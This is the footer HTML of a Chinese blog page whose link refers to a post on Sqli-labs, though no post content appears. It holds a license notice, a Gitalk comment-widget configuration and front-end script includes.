<strong>本文链接：</strong><a href="http://blog.m1n.me/2019/10/12/Sqli-labs/" title="http://blog.m1n.me/2019/10/12/Sqli-labs/" target="_blank" rel="noopener">http://blog.m1n.me/2019/10/12/Sqli-labs/</a><br>

  <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可 <br>

</div>

{% endif %}
  
  <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/npm/mdui@0.4.3/dist/js/mdui.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js"></script>
 
    <script src="https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>


 
    <script src="https://cdn.jsdelivr.net/npm/smoothscroll-for-websites@1.4.9/SmoothScroll.min.js"></script>


<script src="https://cdn.jsdelivr.net/gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>

</html>